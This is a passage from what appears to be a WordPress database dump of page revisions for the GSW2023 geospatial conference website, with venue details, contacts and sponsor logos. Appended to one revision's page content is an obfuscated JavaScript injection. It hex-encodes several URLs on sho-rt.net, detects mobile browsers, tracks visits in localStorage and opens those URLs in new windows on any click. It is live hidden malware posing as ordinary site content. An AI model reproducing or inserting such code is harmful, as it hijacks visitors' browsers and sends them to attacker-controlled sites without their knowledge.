main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 23:38:21','2023-08-15 23:38:21','',3066,'https://gsw2023.com/?p=5225',0,'revision','',0),
(5226,1,'2023-08-15 23:41:34','2023-08-15 23:41:34','[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>\r\n\r\n&nbsp;\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731843{margin-top: -15px !important;}\"]</p>\r\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" 